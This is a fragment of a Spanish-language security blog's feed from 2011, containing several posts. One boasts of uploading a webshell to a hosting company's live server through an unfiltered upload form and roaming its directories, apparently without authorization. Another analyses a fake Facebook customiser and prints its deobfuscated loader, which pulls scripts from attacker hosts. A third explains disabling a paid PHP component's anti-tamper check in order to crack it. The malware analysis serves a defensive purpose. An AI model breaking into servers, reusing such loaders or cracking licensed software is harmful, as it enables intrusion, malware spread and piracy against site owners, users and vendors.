&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-7865308832065308014?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/sUih6YJ4Fd1XCPGtFMYtWGjWsJM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sUih6YJ4Fd1XCPGtFMYtWGjWsJM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/sUih6YJ4Fd1XCPGtFMYtWGjWsJM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sUih6YJ4Fd1XCPGtFMYtWGjWsJM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/oloL_g9PDVA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/7865308832065308014/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/11/confidencialcolombiacom-no-es-tan.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/7865308832065308014?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/7865308832065308014?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/oloL_g9PDVA/confidencialcolombiacom-no-es-tan.html" title="confidencialcolombia.com NO ES TAN CONFIDENCIAL" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-32VU_0W3kp0/Tsq0r75jGFI/AAAAAAAAANI/_VGN5Ff3Drw/s72-c/Pantallazo%2Bdel%2B2011-11-21%2B15%253A29%253A14.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/11/confidencialcolombiacom-no-es-tan.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0UGQnw4eSp7ImA9WhRSFkU.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-5878945840167263542</id><published>2011-11-18T22:44:00.000-08:00</published><updated>2011-11-18T22:47:03.231-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-18T22:47:03.231-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Auditorías de Seguridad" /><title>[AUDITORIA DE SEGURIDAD] WEBHosting</title><content type="html">&lt;div class="IMGpequena"&gt;&lt;img height="120" src="http://www.kiplinger.com/tools/slideshows/tax_audit_redflags/images/1.jpg" width="180" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;He estado un poco alejado de mi blog, &lt;i&gt;-estoy estudiando otra área muy diferente a la informática-&lt;/i&gt;, y quiero hacer algo grande y creo que lo encontré.&lt;br /&gt;
&lt;br /&gt;
Aquí les mostraré una pequeña auditoria a un sitio web encargado de prestar servicios de alojamiento web en plataformas UNIX y Windows NT. Con soporte en ASP, MYSQL, PHP, Java, TOMCAT.&lt;br /&gt;
&lt;br /&gt;
Quiero mostrar una parte en la que muestran porque los clientes que tiene los han elegido para almacenar sus información.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;&lt;b&gt;ESTAS SON LAS RAZONES POR LAS QUE MILES DE CLIENTES YA NOS HAN ELEGIDO: &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Desarrollo:&lt;/b&gt; &lt;u&gt;nuestro equipo de programadores In-House está preparado para responder a las demandas de proyectos complejos, dándonos la tranquilidad de que siempre podremos satisfacer las necesidades de nuestros clientes&lt;/u&gt;. Apuntamos constantemente a la innovación y la generación de herramientas propias que nos permitan ofrecer flexibilidad y adaptabilidad. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Seguridad y Mantenimiento:&lt;/b&gt; &lt;u&gt;ponemos a su entera disponibilidad la seguridad de nuestros servidores&lt;/u&gt;, completamente preparados para la instalación de comercios virtuales de cualquier amplitud y, además, &lt;u&gt;poseemos sistemas de supervisión técnica automatizados y mantenimiento operativo durante las 24 horas del día, los 365 días del año&lt;/u&gt;.&lt;/blockquote&gt;&lt;br /&gt;
Por suerte encontré un upload, en donde me permitía subir una webshell &lt;i&gt;-supongo que no tenia filtro de seguridad para los archivos-&lt;/i&gt;, miremos:&lt;br /&gt;
&lt;pre class="brush:php"&gt;if ($users_file != "none") {
   if(!copy($users_file, $copy_path)) {
      echo "El upload fallo!";
   }else{ 
      ?&amp;gt;&amp;lt;A HREF="&amp;lt;? echo $my_file; ?&amp;gt;"&amp;gt;Upload Completo!&amp;lt;/A&amp;gt;
      &amp;lt;? 
         write_total ();
         $fp = fopen ("xxx.xxx", "a+");
         fputs ($fp, "$link,$users_file_name,$height,$width\n");
         fclose($fp);                
      }
   }else{
      echo "&amp;lt;P&amp;gt;Debe seleccionar un archivo para subir&amp;lt;P&amp;gt;"; ?&amp;gt;
      &amp;lt;A HREF="&amp;lt;? echo $PHP_SELF; ?&amp;gt;"&amp;gt;&amp;lt;B&amp;gt;Volver al formulario&amp;lt;/B&amp;gt;&amp;lt;/A&amp;gt;
      &amp;lt;?
}
&lt;/pre&gt;En ese código vemos que no realiza ningún tipo de validación así que podemos subir cualquier clase de archivos.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="IMGpequena"&gt;&lt;img height="264" src="http://3.bp.blogspot.com/-6JZ37cV1k5M/TsdNpwEi5aI/AAAAAAAAAM0/JHcwKEJm7gE/s320/Pantallazo%2Bdel%2B2011-11-19%2B01%253A32%253A53.png" width="320" /&gt;&lt;/div&gt;Ahora ya tengo mi webshell dentro del servidor, que tan pobre es esté servicio que ni un pequeño filtro o es que tan siquiera esconder el upload y mostrarlo sólo a usuarios autenticados.&lt;br /&gt;
&lt;br /&gt;
Tampoco tiene seguridad en sus directorios, puedo moverme entré carpetas del sistema con total disponibilidad, sin ninguna restricción.&lt;br /&gt;
&lt;br /&gt;
Dejaré hasta aquí y más tarde continuaré.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-5878945840167263542?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/JnluWYn3Sb0gUqaxdD9EpXc8yRI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JnluWYn3Sb0gUqaxdD9EpXc8yRI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/JnluWYn3Sb0gUqaxdD9EpXc8yRI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JnluWYn3Sb0gUqaxdD9EpXc8yRI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/ixPOtqsE-vA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/5878945840167263542/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/11/auditoria-de-seguridad-webhosting.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5878945840167263542?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5878945840167263542?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/ixPOtqsE-vA/auditoria-de-seguridad-webhosting.html" title="[AUDITORIA DE SEGURIDAD] WEBHosting" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-6JZ37cV1k5M/TsdNpwEi5aI/AAAAAAAAAM0/JHcwKEJm7gE/s72-c/Pantallazo%2Bdel%2B2011-11-19%2B01%253A32%253A53.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/11/auditoria-de-seguridad-webhosting.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEUFQHk7fCp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-3583264893472090026</id><published>2011-10-19T17:48:00.000-07:00</published><updated>2011-12-08T20:50:11.704-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:50:11.704-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Libro" /><title>[LIBRO] SQL INJECTION ATTACKS AND DEFENSE</title><content type="html">&lt;div style="float: left; padding: 0px 20px 0px 0px; width: auto;"&gt;&lt;img height="200" src="http://i36.tinypic.com/291kjva.jpg" width="160" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Muchas personas dicen que saben lo que es la inyección SQL, pero todo lo que han escuchado o experimentado, son ejemplos triviales. Inyección de SQL es una de las vulnerabilidades más devastador que el impacto de un negocio, ya que puede conducir a la exposición de toda la información confidencial almacenada en de una aplicación de base de datos, incluyendo información útil, tales como nombres de usuario, contraseñas, nombres, direcciones, números de teléfono y detalles de tarjetas de crédito.&lt;br /&gt;
&lt;br /&gt;
Bueno, ¿qué es la inyección SQL? Es la vulnerabilidad que se produce cuando te dan un atacante la posibilidad de influir en el Structured Query Language &lt;i&gt;(SQL)&lt;/i&gt; que una aplicación pasa a una base de datos back-end. Al ser capaz de influir en lo que se pasa la base de datos, el atacante puede aprovechar la sintaxis SQL y las capacidades de sí mismo, así como el poder y la flexibilidad de soportar la funcionalidad de base de datos y la funcionalidad del sistema operativo a disposición de la base de datos SQL injection no es una vulnerabilidad que afecta exclusivamente a las aplicaciones Web,. ningún código que acepta la entrada de una fuente no confiable y luego usa esa información para formar sentencias de SQL dinámico podría ser vulnerable &lt;i&gt;(por ejemplo, "la grasa del cliente" aplicaciones en una arquitectura cliente / servidor)&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
Inyección SQL ha existido probablemente desde las bases de datos SQL se conecta primero a las aplicaciones Web. Sin embargo, Puppy Rain Forest es ampliamente reconocido por su descubrimiento &lt;i&gt;-o por lo menos para llevarlo a la atención del público-&lt;/i&gt;. El día de Navidad de 1998, Rain Forest Puppy escribió un artículo titulado "NT vulnerabilidades Tecnología Web" de Phrack (&lt;a href="http://www.phrack.com/issues.html?issue=54&amp;id=8#article"&gt;http://www.phrack.com/issues.html?issue=54&amp;id=8#article&lt;/a&gt;), un e-zine escrito por y para los piratas informáticos. Rain Forest Puppy también lanzó una advertencia sobre la inyección SQL ("How I Packetstorm hackeado", ubicado en www.wiretrip.net/rfp/txt/rfp2k01.txt) a principios de 2000 que detalla cómo la inyección SQL se utiliza para comprometer un popular sitio web . Desde entonces, muchos investigadores han desarrollado y perfeccionado las técnicas para la explotación de inyección de SQL. Sin embargo, hasta el día de muchos desarrolladores y profesionales de la seguridad todavía no lo entienden así.&lt;br /&gt;
&lt;br /&gt;
&lt;a href='https://docs.google.com/viewer?a=v&amp;pid=explorer&amp;chrome=true&amp;srcid=0B7FJ_rxyScaZNTBhZDY5MmYtNzhlYi00MDc2LWE0NmMtYzkzMjMyMmNkZjkz&amp;hl=es' target="_blank"&gt;Visualizar Online&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-3583264893472090026?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/VAA_K5EeIJraXDFIOtI7Qbp8AhU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VAA_K5EeIJraXDFIOtI7Qbp8AhU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/VAA_K5EeIJraXDFIOtI7Qbp8AhU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VAA_K5EeIJraXDFIOtI7Qbp8AhU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/CRxrk6kuEaY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/3583264893472090026/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/10/libro-sql-injection-attacks-and-defense.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/3583264893472090026?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/3583264893472090026?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/CRxrk6kuEaY/libro-sql-injection-attacks-and-defense.html" title="[LIBRO] SQL INJECTION ATTACKS AND DEFENSE" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://i36.tinypic.com/291kjva_th.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/10/libro-sql-injection-attacks-and-defense.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEUERX45fip7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-7919122035235162695</id><published>2011-09-19T23:59:00.000-07:00</published><updated>2011-12-08T20:50:04.026-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:50:04.026-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Facebook" /><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous" /><category scheme="http://www.blogger.com/atom/ns#" term="Análisis de Malware" /><title>PERSONALIZA TU CUENTA DE FACEBOOK! [FALSO]</title><content type="html">&lt;div style="float: left; padding: 0px 20px 0px 0px; width: auto;"&gt;&lt;img src="http://www.videosynoticias.info/images/2009-bate-records-historicos-en-creacion-de-malware.jpg" width="250" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Recordando el malware que se había infiltrado hace algunos meses llamado &lt;a href="http://shellrootsecurity.blogspot.com/2011/04/la-verdad-de-quien-visita-mi-perfil-en.html"&gt;LA VERDAD DE "QUIEN VISITA MI PERFIL EN FACEBOOK"&lt;/a&gt;. De nuevo hoy me encuentro con otro que realiza la misma acción, sólo que creo que es más avanzado que el anterior. Vamos a detallarlo, &lt;br /&gt;
&lt;br /&gt;
Primero empezamos con la pagina que contiene el malware(&lt;a href="http://www.perfaceplus.com/"&gt;perfaceplus.com&lt;/a&gt;), está nos ofrece la capacidad de modificar la vista de nuestro perfil en la red social &lt;a href="http://www.facebook.com/"&gt;Facebook&lt;/a&gt;, algunos usuarios siguen creyendo que esto es posible, no voy a armar una polémica de que si se puede o no se puede, &lt;i&gt;-aunque para ser sincero, creo que esto es posible y lo tendré en cuenta como proyecto a futuro-&lt;/i&gt;, pero en esté caso es un malware. &lt;br /&gt;
&lt;br /&gt;
Como en la entrada de malware anterior, vemos que la técnica de &lt;b&gt;&lt;a href="http://en.wikipedia.org/wiki/Clickjacking"&gt;Clickjacking&lt;/a&gt;&lt;/b&gt; aun sigue en uso. Para este caso sería hacia la pagina &lt;a href="http://www.facebook.com/pages/Personaliza-tu-F-A-C-E-B-O-O-K/280212222008050"&gt;facebook.com/pages/Personaliza-tu-F-A-C-E-B-O-O-K/280212222008050&lt;/a&gt;, &lt;i&gt;-es sorprendente la cantidad de gente 106.793 que le gusta eso-&lt;/i&gt;. &lt;br /&gt;
&lt;br /&gt;
Iniciando con el analisis hacia este malware empezaremos por la pagina principal &lt;a href="http://www.perfaceplus.com/"&gt;perfaceplus.com&lt;/a&gt;, aquí es donde instalamos unos componentes para si correcta ejecución. Como primer paso tenemos que darle me gusta a &lt;a href="http://www.facebook.com/pages/Personaliza-tu-F-A-C-E-B-O-O-K/280212222008050"&gt;facebook.com/pages/Personaliza-tu-F-A-C-E-B-O-O-K/280212222008050&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
Después instalar una extensión para firefox &lt;i&gt;-cabe aclarar que este malware es para Facebook y Firefox-&lt;/i&gt;, llamada &lt;b&gt;GreaseMonkey&lt;/b&gt;, que permite por medio de pequeñas porciones de código creadas por usuarios, modificar el comportamiento de páginas web específicas. &lt;i&gt;(Wikipedia:&lt;a href="http://es.wikipedia.org/wiki/Greasemonkey"&gt;Greasemonkey&lt;/a&gt;)&lt;/i&gt;. &lt;br /&gt;
&lt;br /&gt;
Continuamente tenemos que acceder a la URL &lt;a href="http://userscripts.org/scripts/source/112021.user.js"&gt;112021.user.js&lt;/a&gt;, que es la porción de código de la que habla la definición de Wikipedia, que cómo siempre esta ofuscada para que el usuario no identifique que es lo que realiza realmente este script. Desofuscando el código quedaría algo como esto: &lt;br /&gt;
&lt;pre class="brush: javascript"&gt;document['ready'] = start(0);
a = 0;

function start(_0xcdbcx2) {
    var _0xcdbcx3 = document['createElement']('script');
    _0xcdbcx3['type'] = 'text/javascript';
    _0xcdbcx3['src'] = 'http://fbuzz.cdnlapf.tk/jspath.js?' + Math['random']() * 999999;
    document['head']['appendChild'](_0xcdbcx3);
};&lt;/pre&gt;De nuevo este escript que lo que hace es añadir la ejecución de un archivo en el head de la pagina, para este caso es &lt;a href="http://fbuzz.cdnlapf.tk/jspath.js?"&gt;jspath.js?&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
Ingresando al archivo externo, nos encontramos con lo siguiente, &lt;br /&gt;
&lt;pre class="brush: javascript"&gt;var thelink1 = "http://content.wuala.com/contents/alexpf25/addon/newengine.js";
var thelink2 = "http://dl.dropbox.com/u/35059217/newengine.js";

function start1(a) {
    var js = document.createElement('script');
    js.type = 'text/javascript';
    js.src = a + '?token=' + Math.random() * 999999;
    js.id = "invoque";
    document.head.appendChild(js);
};
start1(thelink1);
&lt;/pre&gt;Otra vez realiza lo mismo que el script anterior, sólo que para este caso tenemos dos archivos externos los cuales son &lt;a href="http://content.wuala.com/contents/alexpf25/addon/newengine.js"&gt;alexpf25/addon/newengine.js&lt;/a&gt; y &lt;a href="http://dl.dropbox.com/u/35059217/newengine.js"&gt;35059217/newengine.js&lt;/a&gt;, aquí es donde supongo que esta la funcionalidad como tal del malware. &lt;br /&gt;
&lt;blockquote&gt;Curiosamente, leyendo rápidamente me encuentro con lo siguiente, al parecer estan usando como excusa &lt;a href="http://shellrootsecurity.blogspot.com/2011/08/opfacebook-anonymous-contra-facebook.html"&gt;el posible ataque que supuestamente iba a realizar Anonymous contra Facebook&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
&lt;div style="float: left; padding: 0px 20px 0px 0px; width: auto;"&gt;&lt;img src="http://bitelia.com/files/2011/07/anonymouslogo.jpg" width="120" /&gt;&lt;/div&gt;&lt;b&gt;Facebook está siendo atacado por Anonymous.&lt;br /&gt;
&lt;br /&gt;
Por protección de tu cuenta y tu privacidad, no salgas de Facebook, espera 1 minuto y recarga la página (F5) hasta que el mensaje desaparezca.&lt;br /&gt;
&lt;br /&gt;
Solo eres protegido si tienes FBuzz&lt;/b&gt; &lt;/blockquote&gt;&lt;br /&gt;
Siguiendo con el análisis, pude notar que algo redundante este malware, ejecuta varios archivos que contiene casi la misma funcionalidad. Hay 3 archivos que se ejecutan, los dos anteriores y esté &lt;a href="http://content.wuala.com/contents/alexpf25/addon/viralizer.js"&gt;alexpf25/addon/viralizer.js&lt;/a&gt;. Creo que tengo fobia al API de Facebook, hace poco quería hacer algo pero nunca pude entenderla, así que hasta aquí llego yo con este analisis. Tendré que estudiarla y verificar de nuevo. &lt;br /&gt;
&lt;br /&gt;
Para solucionar este molesto malware, podemos eliminar el script que insertamos en la extensión de Firefox &lt;b&gt;GreaseMonkey&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;CONCLUSIÓN GENERAL:&lt;/b&gt;&amp;nbsp;Esto es un Fraude!&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-7919122035235162695?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/LdI9SV7a15pldflbtpMESyy40m0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LdI9SV7a15pldflbtpMESyy40m0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/LdI9SV7a15pldflbtpMESyy40m0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LdI9SV7a15pldflbtpMESyy40m0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/Md53wWTWVDA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/7919122035235162695/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/09/personaliza-tu-cuenta-de-facebook-falso.html#comment-form" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/7919122035235162695?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/7919122035235162695?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/Md53wWTWVDA/personaliza-tu-cuenta-de-facebook-falso.html" title="PERSONALIZA TU CUENTA DE FACEBOOK! [FALSO]" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>2</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/09/personaliza-tu-cuenta-de-facebook-falso.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEUMSHw6cCp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-1879347953899383907</id><published>2011-09-01T14:25:00.000-07:00</published><updated>2011-12-08T20:51:29.218-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:51:29.218-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><category scheme="http://www.blogger.com/atom/ns#" term="Ofuscación" /><title>[ANOTACIÓN MENTAL] DESOFUSCACIÓN DE CÓDIGO PHP</title><content type="html">&lt;div style="float: left; padding: 0px 20px 0px 0px; width: auto;"&gt;&lt;img src="http://blog.undermedia.com.ec/wp-content/uploads/2009/06/1245362447_encrypted.png" width="170" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pues para ser sincero, tuve delirios de profesión y no sabia que hacer con mi vida, creo que había pedido la magia de la programación y de la informática. Pero creo que volvió a renacer en mi esta esencia, ya que esto es en lo único que soy bueno. Decidí entonces liberar algunos componentes que desafortunadamente son de pago, y porque no traducirlas a medida de la "crackeo", por así decirlo. &lt;br /&gt;
&lt;br /&gt;
Empece entonces con el componente &lt;a href="http://phpgrid.com/"&gt;phpGrid&lt;/a&gt;, no daré mucha importancia al funcionamiento, ya que de eso no se trata esta entrada, pero pronto lo verás cuando ya la tenga liberada por completo. &lt;br /&gt;
&lt;br /&gt;
Cuando empece a mirar el código definitivamente lo tome como reto personal, esta como difícil pero no imposible, allí fue donde recorde la canción que dice: "No hay cosas imposibles, sino personas incapaces". &lt;br /&gt;
&lt;br /&gt;
Como lo dije antes, esta entrada es solo como una especie de anotación en algo que no había visto y que quizás puede ayudar a otras personas, que por cierto es un método muy curioso. Dentro de los archivos principales del componente, esta el archivo de nombre &lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;phpGrid.php&lt;/span&gt;, y después de una tabulación del código tenemos la siguientes lineas un poco más claras que al inicio, pero no es suficiente. &lt;br /&gt;
&lt;br /&gt;
El caso es qué, cuando estaba intentando desofuscar el código que esta en base64 a lineas legibles, no pude hacerlo, simplemente dejaba de funcionar, no tenia sentido si sólo estaba cambiando la cadena ofuscada por la cadena original. Al cabo de unos minutos encontré el problema que simplemente es algo idiota, el siguiente código realiza una busqueda con ayuda de expresiones regulares dentro de la variable &lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;$T43D5686285035C13&lt;/span&gt;, que tiene el contenido actual del archivo, guardando el número de coincidencias en la variable &lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;$T6BBC58A3B5B11DC4&lt;/span&gt;. &lt;br /&gt;
&lt;pre class="brush: php"&gt;#
/* ... */
$T43D5686285035C13 = __FILE__;
$T43D5686285035C13 = file_get_contents($T43D5686285035C13);
/* ... */
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
for (;$TBF14159DC7D007D3 &amp;lt; $T0D47BDF6FD9DDE2E;) {
   if (count($T6BBC58A3B5B11DC4)) exit;
   /* ... */
#&lt;/pre&gt;Como vemos, después entrará al ciclo y de inmediato en una condición con la variable anterior, haciendo qué, si existen coincidencias paré la ejecución. Ahora para solucionarlo, tenemos que comentariar la linea de esa condición. Eso es todo, si encuentro algo igual de curioso lo estaré publicando o cuando tenga ya el componente liberado.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-1879347953899383907?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/yUdBq9cinQwtRDnTUzfkcqINIoI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yUdBq9cinQwtRDnTUzfkcqINIoI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/yUdBq9cinQwtRDnTUzfkcqINIoI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yUdBq9cinQwtRDnTUzfkcqINIoI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/dV_zpvhIoo8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/1879347953899383907/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/09/anotacion-mental-desofuscacion-de.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1879347953899383907?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1879347953899383907?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/dV_zpvhIoo8/anotacion-mental-desofuscacion-de.html" title="[ANOTACIÓN MENTAL] DESOFUSCACIÓN DE CÓDIGO PHP" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/09/anotacion-mental-desofuscacion-de.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEUNSXw8cSp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-3246806155106607896</id><published>2011-08-12T23:16:00.000-07:00</published><updated>2011-12-08T20:51:38.279-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:51:38.279-08:00</app:edited><category 